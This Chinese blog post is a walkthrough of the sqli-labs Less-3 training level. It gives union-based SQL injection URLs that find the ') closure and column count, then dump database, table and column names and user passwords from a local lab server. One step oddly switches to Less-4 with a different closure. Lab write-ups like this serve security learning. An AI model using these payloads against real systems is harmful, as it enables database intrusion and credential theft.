当前位置: 首页 > article >正文

sqli-labs靶场第三关less-3

sqli-labs靶场第三关less-3

在这里插入图片描述

1、确定注入点

http://192.168.128.3/sq/Less-3/?id=1
http://192.168.128.3/sq/Less-3/?id=2
有不同回显,判断可能存在注入,

2、判断注入类型

输入

http://192.168.128.3/sq/Less-3/?id=1 and 1=1
http://192.168.128.3/sq/Less-3/?id=1 and 1=2
回显一致,猜测不是数字型注入

加单引号

http://192.168.128.3/sq/Less-3/?id=1’

在这里插入图片描述根据回显判断闭合情况为 ') 确定为字符型注入

3、确定列数

http://192.168.128.3/sq/Less-3/?id=1’) order by 5 --+
http://192.168.128.3/sq/Less-3/?id=1’) order by 4 --+
http://192.168.128.3/sq/Less-3/?id=1’) order by 3 --+

4,5回显报错,3的时候回显正常
确定列数为3

4、确定回显位

http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,2,3 --+

在这里插入图片描述
确定2,3为回显位置

5、确定数据库名,数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()–+

在这里插入图片描述

5、爆出数据库名,表名,列名,数据

  • 爆出数据库名
    http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata --+
  • 爆出选定数据库表名
    http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+
  • 爆出列名
    http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’–+
  • 爆出数据
    http://192.168.128.3/sq/Less-3/?id=-1’) union select 1,group_concat(username,‘%20’,password),3 from security.users–+

最终得到数据
在这里插入图片描述

大功告成


http://www.kler.cn/news/341495.html

相关文章:

  • MySQL GROUP_CONCAT函数踩坑小记
  • 领域驱动设计DDD的工作机制
  • 基于ZABBIX监控 RabbitMQ服务开箱模板汉化及适用性改造
  • 相亲交友系统的商业模式探讨
  • Android Studio Koala Feature Drop 稳定版现已推出
  • 在滴滴和字节划水6年,过于真实了。。。
  • 刷题小计六:矩阵
  • 【fastjson】json对象格式化打印
  • 2015年国赛高教杯数学建模C题月上柳梢头解题全过程文档及程序
  • 无人自助超市系统小程序源码开发
  • 谈谈bluestore与rocksdbstore(未完,待续)
  • 什么是网络信息安全?
  • 考研笔试/上机经典编程题集合(持续更新并完善解题思路)
  • 2024 kali虚拟机安装教程,分两大步骤,图文讲解(1)
  • 云原生日志ELK( logstash安装部署)
  • ABB机器人20195故障报警原因分析
  • 【基础介绍】【OCR】
  • 【微服务】链路追踪 - Micrometer(day9)
  • IT招聘乱象的全面分析
  • 13种pod的状态